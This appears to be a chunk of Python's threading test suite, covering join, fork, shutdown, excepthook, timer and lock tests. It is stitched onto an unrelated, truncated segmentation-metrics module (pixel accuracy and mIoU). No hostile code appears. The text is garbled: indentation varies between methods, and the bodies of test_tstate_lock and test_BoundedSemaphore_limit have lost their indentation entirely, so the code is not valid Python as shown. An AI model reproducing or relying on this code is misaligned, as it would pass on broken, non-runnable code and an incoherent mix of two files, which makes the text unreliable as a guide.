def test_enumerate_after_join(self):
    # Try hard to trigger #1703448: a thread is still returned in
    # threading.enumerate() after it has been join()ed.
    enum = threading.enumerate
    old_interval = sys.getswitchinterval()
    try:
        for i in range(1, 100):
            # Vary the switch interval to shake out the race at many
            # different thread-scheduling granularities.
            sys.setswitchinterval(i * 0.0002)
            t = threading.Thread(target=lambda: None)
            t.start()
            t.join()
            l = enum()
            self.assertNotIn(t, l,
                "#1703448 triggered after %d trials: %s" % (i, l))
    finally:
        sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
    class RunSelfFunction(object):
        def __init__(self, should_raise):
            # The links in this refcycle from Thread back to self
            # should be cleaned up when the thread completes.
            self.should_raise = should_raise
            self.thread = threading.Thread(target=self._run,
                                           args=(self,),
                                           kwargs={'yet_another':self})
            self.thread.start()

        def _run(self, other_ref, yet_another):
            if self.should_raise:
                raise SystemExit

    # Case 1: target returns normally; the cycle must still be collectable.
    cyclic_object = RunSelfFunction(should_raise=False)
    weak_cyclic_object = weakref.ref(cyclic_object)
    cyclic_object.thread.join()
    del cyclic_object
    # The weakref going dead proves the Thread dropped its target/args refs.
    self.assertIsNone(weak_cyclic_object(),
                      msg=('%d references still around' %
                           sys.getrefcount(weak_cyclic_object())))

    # Case 2: target raises SystemExit; cleanup must happen regardless.
    raising_cyclic_object = RunSelfFunction(should_raise=True)
    weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
    raising_cyclic_object.thread.join()
    del raising_cyclic_object
    self.assertIsNone(weak_raising_cyclic_object(),
                      msg=('%d references still around' %
                           sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
    # Just a quick sanity check to make sure the old method names are
    # still present
    t = threading.Thread()
    t.isDaemon()
    t.setDaemon(True)
    t.getName()
    t.setName("name")
    # isAlive() is deprecated (in favor of is_alive()) and must warn.
    with self.assertWarnsRegex(DeprecationWarning, 'use is_alive()'):
        t.isAlive()
    e = threading.Event()
    e.isSet()
    threading.activeCount()
def test_repr_daemon(self):
    # repr(Thread) should mention "daemon" exactly when the flag is set.
    t = threading.Thread()
    self.assertNotIn('daemon', repr(t))
    t.daemon = True
    self.assertIn('daemon', repr(t))
def test_daemon_param(self):
    # The daemon flag defaults to False and the constructor's daemon=
    # keyword must set it either way.
    t = threading.Thread()
    self.assertFalse(t.daemon)
    t = threading.Thread(daemon=False)
    self.assertFalse(t.daemon)
    t = threading.Thread(daemon=True)
    self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
    # Issue #14308: a dummy thread in the active list doesn't mess up
    # the after-fork mechanism.
    code = """if 1:
        import _thread, threading, os, time

        def background_thread(evt):
            # Creates and registers the _DummyThread instance
            threading.current_thread()
            evt.set()
            time.sleep(10)

        evt = threading.Event()
        _thread.start_new_thread(background_thread, (evt,))
        evt.wait()
        assert threading.active_count() == 2, threading.active_count()
        if os.fork() == 0:
            assert threading.active_count() == 1, threading.active_count()
            os._exit(0)
        else:
            os.wait()
    """
    # The asserts run in the child script; any failure shows up on stderr.
    _, out, err = assert_python_ok("-c", code)
    self.assertEqual(out, b'')
    self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
    # Try hard to trigger #18418: is_alive() could sometimes be True on
    # threads that vanished after a fork.
    old_interval = sys.getswitchinterval()
    self.addCleanup(sys.setswitchinterval, old_interval)

    # Make the bug more likely to manifest.
    test.support.setswitchinterval(1e-6)

    for i in range(20):
        t = threading.Thread(target=lambda: None)
        t.start()
        pid = os.fork()
        if pid == 0:
            # In the child: the worker does not exist here, so is_alive()
            # must be False. Exit status encodes the check result.
            os._exit(11 if t.is_alive() else 10)
        else:
            t.join()

            pid, status = os.waitpid(pid, 0)
            self.assertTrue(os.WIFEXITED(status))
            self.assertEqual(10, os.WEXITSTATUS(status))
def test_main_thread(self):
    # main_thread() must be the thread running this test (the main thread).
    main = threading.main_thread()
    self.assertEqual(main.name, 'MainThread')
    self.assertEqual(main.ident, threading.current_thread().ident)
    self.assertEqual(main.ident, threading.get_ident())

    def f():
        # From a worker thread, main_thread() must NOT be the current one.
        self.assertNotEqual(threading.main_thread().ident,
                            threading.current_thread().ident)
    th = threading.Thread(target=f)
    th.start()
    th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
    # After fork() from the main thread, the child's main thread must be
    # the (only) current thread.
    code = """if 1:
        import os, threading

        pid = os.fork()
        if pid == 0:
            main = threading.main_thread()
            print(main.name)
            print(main.ident == threading.current_thread().ident)
            print(main.ident == threading.get_ident())
        else:
            os.waitpid(pid, 0)
    """
    _, out, err = assert_python_ok("-c", code)
    data = out.decode().replace('\r', '')
    self.assertEqual(err, b"")
    self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
    # When a *worker* thread forks, that worker becomes the child's main
    # thread — but it keeps its original name ("Thread-1").
    code = """if 1:
        import os, threading, sys

        def f():
            pid = os.fork()
            if pid == 0:
                main = threading.main_thread()
                print(main.name)
                print(main.ident == threading.current_thread().ident)
                print(main.ident == threading.get_ident())
                # stdout is fully buffered because not a tty,
                # we have to flush before exit.
                sys.stdout.flush()
            else:
                os.waitpid(pid, 0)

        th = threading.Thread(target=f)
        th.start()
        th.join()
    """
    _, out, err = assert_python_ok("-c", code)
    data = out.decode().replace('\r', '')
    self.assertEqual(err, b"")
    self.assertEqual(data, "Thread-1\nTrue\nTrue\n")
@requires_type_collecting
def test_main_thread_during_shutdown(self):
    # bpo-31516: current_thread() should still point to the main thread
    # at shutdown
    code = """if 1:
        import gc, threading

        main_thread = threading.current_thread()
        assert main_thread is threading.main_thread()  # sanity check

        class RefCycle:
            def __init__(self):
                self.cycle = self

            def __del__(self):
                print("GC:",
                      threading.current_thread() is main_thread,
                      threading.main_thread() is main_thread,
                      threading.enumerate() == [main_thread])

        RefCycle()
        gc.collect()  # sanity check
        x = RefCycle()
    """
    _, out, err = assert_python_ok("-c", code)
    data = out.decode()
    self.assertEqual(err, b"")
    # One line from the explicit gc.collect(), one from interpreter
    # shutdown finalizing the leftover cycle.
    self.assertEqual(data.splitlines(),
                     ["GC: True True True"] * 2)
    def test_finalization_shutdown(self):
        # bpo-36402: Py_Finalize() calls threading._shutdown() which must wait
        # until Python thread states of all non-daemon threads get deleted.
        #
        # Test similar to SubinterpThreadingTests.test_threads_join_2(), but
        # test the finalization of the main interpreter.
        code = """if 1:
            import os
            import threading
            import time
            import random
            def random_sleep():
                seconds = random.random() * 0.010
                time.sleep(seconds)
            class Sleeper:
                def __del__(self):
                    random_sleep()
            tls = threading.local()
            def f():
                # Sleep a bit so that the thread is still running when
                # Py_Finalize() is called.
                random_sleep()
                tls.x = Sleeper()
                random_sleep()
            threading.Thread(target=f).start()
            random_sleep()
        """
        rc, out, err = assert_python_ok("-c", code)
        # A clean (empty-stderr) exit shows finalization waited correctly.
        self.assertEqual(err, b"")
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertFalse(tstate_lock.acquire(timeout=0), False)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertTrue(tstate_lock.acquire(timeout=5), False)
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertIsNone(t._tstate_lock)
t.join()
    def test_repr_stopped(self):
        # Verify that "stopped" shows up in repr(Thread) appropriately.
        started = _thread.allocate_lock()
        finish = _thread.allocate_lock()
        started.acquire()
        finish.acquire()
        def f():
            # Signal that we are running, then block until told to finish.
            started.release()
            finish.acquire()
        t = threading.Thread(target=f)
        t.start()
        started.acquire()
        self.assertIn("started", repr(t))
        finish.release()
        # "stopped" should appear in the repr in a reasonable amount of time.
        # Implementation detail: as of this writing, that's trivially true
        # if .join() is called, and almost trivially true if .is_alive() is
        # called. The detail we're testing here is that "stopped" shows up
        # "all on its own".
        LOOKING_FOR = "stopped"
        for i in range(500):
            if LOOKING_FOR in repr(t):
                break
            time.sleep(0.01)
        self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
        t.join()
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
    @cpython_only
    def test_frame_tstate_tracing(self):
        # Issue #14432: Crash when a generator is created in a C thread that is
        # destroyed while the generator is still used. The issue was that a
        # generator contains a frame, and the frame kept a reference to the
        # Python state of the destroyed C thread. The crash occurs when a trace
        # function is setup.
        def noop_trace(frame, event, arg):
            # no operation
            return noop_trace
        def generator():
            while 1:
                yield "generator"
        def callback():
            # Lazily create the generator the first time we are called
            # (i.e. inside the temporary C thread).
            if callback.gen is None:
                callback.gen = generator()
            return next(callback.gen)
        callback.gen = None
        old_trace = sys.gettrace()
        sys.settrace(noop_trace)
        try:
            # Install a trace function
            threading.settrace(noop_trace)
            # Create a generator in a C thread which exits after the call
            import _testcapi
            _testcapi.call_in_temporary_c_thread(callback)
            # Call the generator in a different Python thread, check that the
            # generator didn't keep a reference to the destroyed thread state
            for test in range(3):
                # The trace function is still called here
                callback()
        finally:
            # Always restore the previous trace function.
            sys.settrace(old_trace)
class ThreadJoinOnShutdown(BaseTestCase):
    """Scenarios mixing thread joining with interpreter/process shutdown."""

    def _run_and_join(self, script):
        # Run *script* (which must print 'end of main') in a fresh
        # interpreter, after prepending a joiningfunc() helper that joins
        # the given thread and then prints 'end of thread'.
        script = """if 1:
            import sys, os, time, threading
            # a thread, which waits for the main program to terminate
            def joiningfunc(mainthread):
                mainthread.join()
                print('end of thread')
                # stdout is fully buffered because not a tty, we have to flush
                # before exit.
                sys.stdout.flush()
        \n""" + script

        rc, out, err = assert_python_ok("-c", script)
        data = out.decode().replace('\r', '')
        self.assertEqual(data, "end of main\nend of thread\n")

    def test_1_join_on_shutdown(self):
        # The usual case: on exit, wait for a non-daemon thread
        script = """if 1:
            import os
            t = threading.Thread(target=joiningfunc,
                                 args=(threading.current_thread(),))
            t.start()
            time.sleep(0.1)
            print('end of main')
            """
        self._run_and_join(script)

    @unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
    @unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
    def test_2_join_in_forked_process(self):
        # Like the test above, but from a forked interpreter
        script = """if 1:
            childpid = os.fork()
            if childpid != 0:
                os.waitpid(childpid, 0)
                sys.exit(0)
            t = threading.Thread(target=joiningfunc,
                                 args=(threading.current_thread(),))
            t.start()
            print('end of main')
            """
        self._run_and_join(script)

    @unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
    @unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
    def test_3_join_in_forked_from_thread(self):
        # Like the test above, but fork() was called from a worker thread
        # In the forked process, the main Thread object must be marked as stopped.
        script = """if 1:
            main_thread = threading.current_thread()
            def worker():
                childpid = os.fork()
                if childpid != 0:
                    os.waitpid(childpid, 0)
                    sys.exit(0)
                t = threading.Thread(target=joiningfunc,
                                     args=(main_thread,))
                print('end of main')
                t.start()
                t.join() # Should not block: main_thread is already stopped
            w = threading.Thread(target=worker)
            w.start()
            """
        self._run_and_join(script)

    @unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
    def test_4_daemon_threads(self):
        # Check that a daemon thread cannot crash the interpreter on shutdown
        # by manipulating internal structures that are being disposed of in
        # the main thread.
        script = """if True:
            import os
            import random
            import sys
            import time
            import threading
            thread_has_run = set()
            def random_io():
                '''Loop for a while sleeping random tiny amounts and doing some I/O.'''
                while True:
                    with open(os.__file__, 'rb') as in_f:
                        stuff = in_f.read(200)
                        with open(os.devnull, 'wb') as null_f:
                            null_f.write(stuff)
                            time.sleep(random.random() / 1995)
                    thread_has_run.add(threading.current_thread())
            def main():
                count = 0
                for _ in range(40):
                    new_thread = threading.Thread(target=random_io)
                    new_thread.daemon = True
                    new_thread.start()
                    count += 1
                while len(thread_has_run) < count:
                    time.sleep(0.001)
                # Trigger process shutdown
                sys.exit(0)
            main()
            """
        rc, out, err = assert_python_ok('-c', script)
        # No tracebacks/crashes allowed on stderr.
        self.assertFalse(err)

    @unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
    @unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
    def test_reinit_tls_after_fork(self):
        # Issue #13817: fork() would deadlock in a multithreaded program with
        # the ad-hoc TLS implementation.
        def do_fork_and_wait():
            # just fork a child process and wait it
            pid = os.fork()
            if pid > 0:
                os.waitpid(pid, 0)
            else:
                os._exit(0)

        # start a bunch of threads that will fork() child processes
        threads = []
        for i in range(16):
            t = threading.Thread(target=do_fork_and_wait)
            threads.append(t)
            t.start()

        for t in threads:
            t.join()

    @unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
    def test_clear_threads_states_after_fork(self):
        # Issue #17094: check that threads states are cleared after fork()

        # start a bunch of threads
        threads = []
        for i in range(16):
            t = threading.Thread(target=lambda : time.sleep(0.3))
            threads.append(t)
            t.start()

        pid = os.fork()
        if pid == 0:
            # check that threads states have been cleared
            if len(sys._current_frames()) == 1:
                os._exit(0)
            else:
                os._exit(1)
        else:
            # Child's exit status 0 means only one frame was left.
            _, status = os.waitpid(pid, 0)
            self.assertEqual(0, status)

        for t in threads:
            t.join()
class SubinterpThreadingTests(BaseTestCase):
    """Thread handling during subinterpreter shutdown."""

    def test_threads_join(self):
        # Non-daemon threads should be joined at subinterpreter shutdown
        # (issue #18808)
        r, w = os.pipe()
        self.addCleanup(os.close, r)
        self.addCleanup(os.close, w)
        code = r"""if 1:
            import os
            import random
            import threading
            import time
            def random_sleep():
                seconds = random.random() * 0.010
                time.sleep(seconds)
            def f():
                # Sleep a bit so that the thread is still running when
                # Py_EndInterpreter is called.
                random_sleep()
                os.write(%d, b"x")
            threading.Thread(target=f).start()
            random_sleep()
        """ % (w,)
        ret = test.support.run_in_subinterp(code)
        self.assertEqual(ret, 0)
        # The thread was joined properly.
        self.assertEqual(os.read(r, 1), b"x")

    def test_threads_join_2(self):
        # Same as above, but a delay gets introduced after the thread's
        # Python code returned but before the thread state is deleted.
        # To achieve this, we register a thread-local object which sleeps
        # a bit when deallocated.
        r, w = os.pipe()
        self.addCleanup(os.close, r)
        self.addCleanup(os.close, w)
        code = r"""if 1:
            import os
            import random
            import threading
            import time
            def random_sleep():
                seconds = random.random() * 0.010
                time.sleep(seconds)
            class Sleeper:
                def __del__(self):
                    random_sleep()
            tls = threading.local()
            def f():
                # Sleep a bit so that the thread is still running when
                # Py_EndInterpreter is called.
                random_sleep()
                tls.x = Sleeper()
                os.write(%d, b"x")
            threading.Thread(target=f).start()
            random_sleep()
        """ % (w,)
        ret = test.support.run_in_subinterp(code)
        self.assertEqual(ret, 0)
        # The thread was joined properly.
        self.assertEqual(os.read(r, 1), b"x")

    @cpython_only
    def test_daemon_threads_fatal_error(self):
        # A daemon thread still running when its subinterpreter is ended
        # is a fatal error.
        subinterp_code = r"""if 1:
            import os
            import threading
            import time
            def f():
                # Make sure the daemon thread is still running when
                # Py_EndInterpreter is called.
                time.sleep(10)
            threading.Thread(target=f, daemon=True).start()
        """
        script = r"""if 1:
            import _testcapi
            _testcapi.run_in_subinterp(%r)
        """ % (subinterp_code,)
        with test.support.SuppressCrashReport():
            rc, out, err = assert_python_failure("-c", script)
        self.assertIn("Fatal Python error: Py_EndInterpreter: "
                      "not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
    # A RuntimeError should be raised if Thread.start() is called
    # multiple times.
    def test_start_thread_again(self):
        thread = threading.Thread()
        thread.start()
        self.assertRaises(RuntimeError, thread.start)
        thread.join()

    def test_joining_current_thread(self):
        # A thread cannot join itself.
        current_thread = threading.current_thread()
        self.assertRaises(RuntimeError, current_thread.join);

    def test_joining_inactive_thread(self):
        # Joining a thread that was never started is an error.
        thread = threading.Thread()
        self.assertRaises(RuntimeError, thread.join)

    def test_daemonize_active_thread(self):
        # The daemon flag can only be changed before start().
        thread = threading.Thread()
        thread.start()
        self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
        thread.join()

    def test_releasing_unacquired_lock(self):
        lock = threading.Lock()
        self.assertRaises(RuntimeError, lock.release)

    @unittest.skipUnless(sys.platform == 'darwin' and test.support.python_is_optimized(),
                         'test macosx problem')
    def test_recursion_limit(self):
        # Issue 9670
        # test that excessive recursion within a non-main thread causes
        # an exception rather than crashing the interpreter on platforms
        # like Mac OS X or FreeBSD which have small default stack sizes
        # for threads
        script = """if True:
            import threading
            def recurse():
                return recurse()
            def outer():
                try:
                    recurse()
                except RecursionError:
                    pass
            w = threading.Thread(target=outer)
            w.start()
            w.join()
            print('end of main thread')
            """
        expected_output = "end of main thread\n"
        p = subprocess.Popen([sys.executable, "-c", script],
                             stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        stdout, stderr = p.communicate()
        data = stdout.decode().replace('\r', '')
        self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
        self.assertEqual(data, expected_output)

    def test_print_exception(self):
        # An unhandled exception in a thread produces a full traceback
        # report on stderr.
        script = r"""if True:
            import threading
            import time
            running = False
            def run():
                global running
                running = True
                while running:
                    time.sleep(0.01)
                1/0
            t = threading.Thread(target=run)
            t.start()
            while not running:
                time.sleep(0.01)
            running = False
            t.join()
            """
        rc, out, err = assert_python_ok("-c", script)
        self.assertEqual(out, b'')
        err = err.decode()
        self.assertIn("Exception in thread", err)
        self.assertIn("Traceback (most recent call last):", err)
        self.assertIn("ZeroDivisionError", err)
        self.assertNotIn("Unhandled exception", err)

    @requires_type_collecting
    def test_print_exception_stderr_is_none_1(self):
        # sys.stderr is replaced by None only *after* the thread started:
        # the traceback must still be printed.
        script = r"""if True:
            import sys
            import threading
            import time
            running = False
            def run():
                global running
                running = True
                while running:
                    time.sleep(0.01)
                1/0
            t = threading.Thread(target=run)
            t.start()
            while not running:
                time.sleep(0.01)
            sys.stderr = None
            running = False
            t.join()
            """
        rc, out, err = assert_python_ok("-c", script)
        self.assertEqual(out, b'')
        err = err.decode()
        self.assertIn("Exception in thread", err)
        self.assertIn("Traceback (most recent call last):", err)
        self.assertIn("ZeroDivisionError", err)
        self.assertNotIn("Unhandled exception", err)

    def test_print_exception_stderr_is_none_2(self):
        # sys.stderr is None *before* the thread is created: no usable
        # stderr, so no report is expected (and no secondary failure).
        script = r"""if True:
            import sys
            import threading
            import time
            running = False
            def run():
                global running
                running = True
                while running:
                    time.sleep(0.01)
                1/0
            sys.stderr = None
            t = threading.Thread(target=run)
            t.start()
            while not running:
                time.sleep(0.01)
            running = False
            t.join()
            """
        rc, out, err = assert_python_ok("-c", script)
        self.assertEqual(out, b'')
        self.assertNotIn("Unhandled exception", err.decode())

    def test_bare_raise_in_brand_new_thread(self):
        # bpo-27558: a bare ``raise`` with no active exception must raise
        # RuntimeError, even in a freshly created thread.
        def bare_raise():
            raise

        class Issue27558(threading.Thread):
            exc = None

            def run(self):
                try:
                    bare_raise()
                except Exception as exc:
                    self.exc = exc

        thread = Issue27558()
        thread.start()
        thread.join()
        self.assertIsNotNone(thread.exc)
        self.assertIsInstance(thread.exc, RuntimeError)
        # explicitly break the reference cycle to not leak a dangling thread
        thread.exc = None
class ThreadRunFail(threading.Thread):
    """Helper thread whose run() method always fails with ValueError."""

    def run(self):
        raise ValueError("run failed")
class ExceptHookTests(BaseTestCase):
    """Tests for threading.excepthook()."""

    def test_excepthook(self):
        # The default hook reports the failing thread by name plus the
        # full traceback on stderr.
        with support.captured_output("stderr") as stderr:
            thread = ThreadRunFail(name="excepthook thread")
            thread.start()
            thread.join()
        stderr = stderr.getvalue().strip()
        self.assertIn(f'Exception in thread {thread.name}:\n', stderr)
        self.assertIn('Traceback (most recent call last):\n', stderr)
        self.assertIn(' raise ValueError("run failed")', stderr)
        self.assertIn('ValueError: run failed', stderr)

    @support.cpython_only
    def test_excepthook_thread_None(self):
        # threading.excepthook called with thread=None: log the thread
        # identifier in this case.
        with support.captured_output("stderr") as stderr:
            try:
                raise ValueError("bug")
            except Exception as exc:
                args = threading.ExceptHookArgs([*sys.exc_info(), None])
                try:
                    threading.excepthook(args)
                finally:
                    # Explicitly break a reference cycle
                    args = None

        stderr = stderr.getvalue().strip()
        self.assertIn(f'Exception in thread {threading.get_ident()}:\n', stderr)
        self.assertIn('Traceback (most recent call last):\n', stderr)
        self.assertIn(' raise ValueError("bug")', stderr)
        self.assertIn('ValueError: bug', stderr)

    def test_system_exit(self):
        class ThreadExit(threading.Thread):
            def run(self):
                sys.exit(1)

        # threading.excepthook() silently ignores SystemExit
        with support.captured_output("stderr") as stderr:
            thread = ThreadExit()
            thread.start()
            thread.join()
        self.assertEqual(stderr.getvalue(), '')

    def test_custom_excepthook(self):
        # A replacement hook receives an args object carrying the
        # exception info and the thread that failed.
        args = None

        def hook(hook_args):
            nonlocal args
            args = hook_args

        try:
            with support.swap_attr(threading, 'excepthook', hook):
                thread = ThreadRunFail()
                thread.start()
                thread.join()
            self.assertEqual(args.exc_type, ValueError)
            self.assertEqual(str(args.exc_value), 'run failed')
            self.assertEqual(args.exc_traceback, args.exc_value.__traceback__)
            self.assertIs(args.thread, thread)
        finally:
            # Break reference cycle
            args = None

    def test_custom_excepthook_fail(self):
        # If threading.excepthook itself raises, the secondary failure is
        # routed to sys.excepthook with a one-line notice on stderr.
        def threading_hook(args):
            raise ValueError("threading_hook failed")

        err_str = None

        def sys_hook(exc_type, exc_value, exc_traceback):
            nonlocal err_str
            err_str = str(exc_value)

        with support.swap_attr(threading, 'excepthook', threading_hook), \
             support.swap_attr(sys, 'excepthook', sys_hook), \
             support.captured_output('stderr') as stderr:
            thread = ThreadRunFail()
            thread.start()
            thread.join()

        self.assertEqual(stderr.getvalue(),
                         'Exception in threading.excepthook:\n')
        self.assertEqual(err_str, 'threading_hook failed')
class TimerTests(BaseTestCase):
    def setUp(self):
        BaseTestCase.setUp(self)
        # Arguments observed by the spy callback, plus an event that
        # signals each time the callback fires.
        self.callback_args = []
        self.callback_event = threading.Event()

    def test_init_immutable_default_args(self):
        # Issue 17435: constructor defaults were mutable objects, they could be
        # mutated via the object attributes and affect other Timer objects.
        timer1 = threading.Timer(0.01, self._callback_spy)
        timer1.start()
        self.callback_event.wait()
        # Mutate timer1's args/kwargs; timer2 must not observe the change.
        timer1.args.append("blah")
        timer1.kwargs["foo"] = "bar"
        self.callback_event.clear()
        timer2 = threading.Timer(0.01, self._callback_spy)
        timer2.start()
        self.callback_event.wait()
        self.assertEqual(len(self.callback_args), 2)
        self.assertEqual(self.callback_args, [((), {}), ((), {})])
        timer1.join()
        timer2.join()

    def _callback_spy(self, *args, **kwargs):
        # Snapshot the call arguments (copy, so later mutation of the
        # timer's attributes cannot retroactively change the record).
        self.callback_args.append((args[:], kwargs.copy()))
        self.callback_event.set()
# Bind the generic lock_tests suites to the concrete threading primitives.

class LockTests(lock_tests.LockTests):
    locktype = staticmethod(threading.Lock)

class PyRLockTests(lock_tests.RLockTests):
    # Pure-Python RLock implementation.
    locktype = staticmethod(threading._PyRLock)

@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
    # C-accelerated RLock implementation.
    locktype = staticmethod(threading._CRLock)

class EventTests(lock_tests.EventTests):
    eventtype = staticmethod(threading.Event)

class ConditionAsRLockTests(lock_tests.RLockTests):
    # Condition uses an RLock by default and exports its API.
    locktype = staticmethod(threading.Condition)

class ConditionTests(lock_tests.ConditionTests):
    condtype = staticmethod(threading.Condition)

class SemaphoreTests(lock_tests.SemaphoreTests):
    semtype = staticmethod(threading.Semaphore)

class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
    semtype = staticmethod(threading.BoundedSemaphore)

class BarrierTests(lock_tests.BarrierTests):
    barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
    def test__all__(self):
        # threading.__all__ must cover the public API; the deprecated
        # camelCase aliases are deliberately excluded via the blacklist.
        extra = {"ThreadError"}
        blacklist = {'currentThread', 'activeCount'}
        support.check__all__(self, threading, ('threading', '_thread'),
                             extra=extra, blacklist=blacklist)
class InterruptMainTests(unittest.TestCase):
    def test_interrupt_main_subthread(self):
        # Calling start_new_thread with a function that executes interrupt_main
        # should raise KeyboardInterrupt upon completion.
        def call_interrupt():
            _thread.interrupt_main()
        t = threading.Thread(target=call_interrupt)
        with self.assertRaises(KeyboardInterrupt):
            t.start()
            t.join()
        # Join again outside the assert to make sure the thread is done.
        t.join()

    def test_interrupt_main_mainthread(self):
        # Make sure that if interrupt_main is called in main thread that
        # KeyboardInterrupt is raised instantly.
        with self.assertRaises(KeyboardInterrupt):
            _thread.interrupt_main()

    def test_interrupt_main_noerror(self):
        handler = signal.getsignal(signal.SIGINT)
        try:
            # No exception should arise.
            signal.signal(signal.SIGINT, signal.SIG_IGN)
            _thread.interrupt_main()
            signal.signal(signal.SIGINT, signal.SIG_DFL)
            _thread.interrupt_main()
        finally:
            # Restore original handler
            signal.signal(signal.SIGINT, handler)
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
|
metric.py | from __future__ import division
import threading
import numpy as np
__all__ = ['SegmentationMetric', 'batch_pix_accuracy', 'batch_intersection_union',
'pixelAccuracy', 'intersectionAndUnion', 'hist_info', 'compute_score']
"""Evaluation Metrics for Semantic Segmentation"""
class SegmentationMetric(object):
    """Computes pixAcc and mIoU metric scores.

    Accumulation is protected by a lock so that ``evaluate_worker`` can be
    called concurrently from several threads.
    """

    def __init__(self, nclass):
        """
        Parameters
        ----------
        nclass : int
            Number of classes in the segmentation task.
        """
        super(SegmentationMetric, self).__init__()
        self.nclass = nclass
        self.lock = threading.Lock()
        self.reset()

    def update(self, preds, labels):
        """Updates the internal evaluation result.

        Parameters
        ----------
        labels : 'NumpyArray' or list of `NumpyArray`
            The labels of the data.
        preds : 'NumpyArray' or list of `NumpyArray`
            Predicted values.
        """
        if isinstance(preds, np.ndarray):
            self.evaluate_worker(preds, labels)
        elif isinstance(preds, (list, tuple)):
            # One thread per (pred, label) pair; the lock in
            # evaluate_worker serializes the accumulation itself.
            threads = [threading.Thread(target=self.evaluate_worker, args=(pred, label), )
                       for (pred, label) in zip(preds, labels)]
            for thread in threads:
                thread.start()
            for thread in threads:
                thread.join()

    def get(self):
        """Gets the current evaluation result.

        Returns
        -------
        metrics : tuple of float
            pixAcc and mIoU
        """
        # Fix: removed a leftover debug print of the raw counters that
        # polluted stdout on every call.
        # np.spacing(1) guards against division by zero.
        pixAcc = 1.0 * self.total_correct / (np.spacing(1) + self.total_label)
        IoU = 1.0 * self.total_inter / (np.spacing(1) + self.total_union)
        # It has same result with np.nanmean() when all class exist
        mIoU = IoU.mean()
        return pixAcc, mIoU

    def evaluate_worker(self, pred, label):
        """Accumulate statistics for one (pred, label) pair; thread-safe."""
        correct, labeled = batch_pix_accuracy(pred, label)
        inter, union = batch_intersection_union(pred, label, self.nclass)
        with self.lock:
            self.total_correct += correct
            self.total_label += labeled
            self.total_inter += inter
            self.total_union += union

    def reset(self):
        """Resets the internal evaluation result to initial state."""
        self.total_inter = 0
        self.total_union = 0
        self.total_correct = 0
        self.total_label = 0
def batch_pix_accuracy(predict, target):
    """PixAcc"""
    # inputs are numpy arrays of identical shape
    assert predict.shape == target.shape
    # Shift labels by one so that ignore pixels (label -1) map to zero and
    # fall out of the "valid" mask below.
    shifted_pred = predict.astype('int64') + 1
    shifted_target = target.astype('int64') + 1
    valid = shifted_target > 0
    pixel_labeled = np.sum(valid)
    pixel_correct = np.sum((shifted_pred == shifted_target) * valid)
    assert pixel_correct <= pixel_labeled, "Correct area should be smaller than Labeled"
    return pixel_correct, pixel_labeled
def batch_intersection_union(predict, target, nclass):
    """mIoU"""
    # inputs are numpy arrays of identical shape; label -1 marks ignored pixels
    assert predict.shape == target.shape
    mini, maxi, nbins = 1, nclass, nclass
    # Shift by one so ignored pixels (label -1) become 0, which lies outside
    # the histogram range [mini, maxi] and is therefore never counted.
    shifted_pred = predict.astype('int64') + 1
    shifted_target = target.astype('int64') + 1
    shifted_pred = shifted_pred * (shifted_target > 0).astype(shifted_pred.dtype)
    # Pixels where (masked) prediction and target agree form the intersection.
    inter_map = shifted_pred * (shifted_pred == shifted_target)
    area_inter, _ = np.histogram(inter_map, bins=nbins, range=(mini, maxi))
    area_pred, _ = np.histogram(shifted_pred, bins=nbins, range=(mini, maxi))
    area_lab, _ = np.histogram(shifted_target, bins=nbins, range=(mini, maxi))
    area_union = area_pred + area_lab - area_inter
